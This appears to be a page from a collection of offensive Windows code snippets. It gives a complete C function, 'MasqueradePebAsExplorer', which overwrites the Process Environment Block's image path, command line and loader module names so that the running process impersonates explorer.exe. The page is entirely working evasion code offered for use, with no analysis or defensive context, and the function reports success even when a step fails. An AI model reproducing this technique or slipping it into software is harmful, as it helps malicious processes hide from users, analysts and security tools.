Masquerade Peb as Explorer
Example snippet of usage
BOOL MasqueradePebAsExplorer(PWCHAR *Buffer)
{
typedef NTSTATUS(NTAPI* RTLENTERCRITICALSECTION)(PRTL_CRITICAL_SECTION);
typedef NTSTATUS(NTAPI* RTLLEAVECRITICALSECTION)(PRTL_CRITICAL_SECTION);
RTLENTERCRITICALSECTION RtlEnterCriticalSection = NULL;
RTLLEAVECRITICALSECTION RtlLeaveCriticalSection = NULL;
HMODULE Module = NULL;
LPWSTR WindowsPath = NULL;
PPEB Peb = GetPeb();
PLDR_MODULE InMemoryBinaryLoaderData = NULL;
Module = GetModuleHandleA("ntdll.dll");
if (Module == NULL)
goto EXIT_ROUTINE;
RtlEnterCriticalSection = (RTLENTERCRITICALSECTION)GetProcAddress(Module, "RtlEnterCriticalSection");
RtlLeaveCriticalSection = (RTLLEAVECRITICALSECTION)GetProcAddress(Module, "RtlLeaveCriticalSection");
if (!RtlEnterCriticalSection || !RtlLeaveCriticalSection)
goto EXIT_ROUTINE;
if (!SUCCEEDED(SHGetKnownFolderPath(FOLDERID_Windows, 0, NULL, &WindowsPath)))
goto EXIT_ROUTINE;
*Buffer = (PWCHAR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, MAX_PATH * sizeof(WCHAR));
if (*Buffer == NULL)
goto EXIT_ROUTINE;
if (StringCopyW(*Buffer, WindowsPath) == NULL)
goto EXIT_ROUTINE;
if (StringConcatW(*Buffer, (PWCHAR)L"\\explorer.exe") == NULL)
goto EXIT_ROUTINE;
InMemoryBinaryLoaderData = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);
RtlEnterCriticalSection((PRTL_CRITICAL_SECTION)Peb->FastPebLock);
RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, *Buffer);
RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, *Buffer);
RtlInitUnicodeString(&InMemoryBinaryLoaderData->FullDllName, *Buffer);
RtlInitUnicodeString(&InMemoryBinaryLoaderData->BaseDllName, *Buffer);
RtlLeaveCriticalSection((PRTL_CRITICAL_SECTION)Peb->FastPebLock);
EXIT_ROUTINE:
if (WindowsPath)
CoTaskMemFree(WindowsPath);
return TRUE;
}Last updated